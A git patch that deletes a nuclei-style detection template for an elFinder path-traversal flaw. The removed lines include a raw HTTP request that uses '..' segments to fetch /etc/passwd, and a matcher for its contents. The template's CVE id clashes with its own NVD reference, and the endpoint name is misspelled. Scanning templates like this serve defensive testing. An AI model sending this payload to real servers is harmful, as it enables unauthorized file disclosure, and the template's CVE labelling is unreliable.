From 6735f99a543652f086c1b4b10e9c47439d8d3f22 Mon Sep 17 00:00:00 2001
From: PikPikcU <60111811+pikpikcu@users.noreply.github.com>
Date: Thu, 30 Jun 2022 19:29:52 -0400
Subject: [PATCH] Delete CVE-2022-0543

---
 cves/2022/CVE-2022-0543 | 25 -------------------------
 1 file changed, 25 deletions(-)
 delete mode 100644 cves/2022/CVE-2022-0543

diff --git a/cves/2022/CVE-2022-0543 b/cves/2022/CVE-2022-0543
deleted file mode 100644
index 015a33cf3d..0000000000
--- a/cves/2022/CVE-2022-0543
+++ /dev/null
@@ -1,25 +0,0 @@
-id: CVE-2022-0543
-
-info:
-  name: elFinder - Path Traversal
-  author: pikpikcu
-  severity: critical
-  description: |
-    Connector.minimal.php in std42 elFinder through 2.1.60 is affected by path traversal. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths.
-  reference:
-    - https://www.synacktiv.com/publications/elfinder-the-story-of-a-repwning.html
-    - https://nvd.nist.gov/vuln/detail/CVE-2022-26960
-  tags: cve,cve2022,lfi,elfinder
-
-requests:
-  - raw:
-      - |
-        GET /elfinder/php/connectot.minimal.php?cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@base64>&download=1 HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded
-
-    matchers-condition: and
-    matchers:
-      - type: regex
-        regex:
-          - "root:.*:0:0:"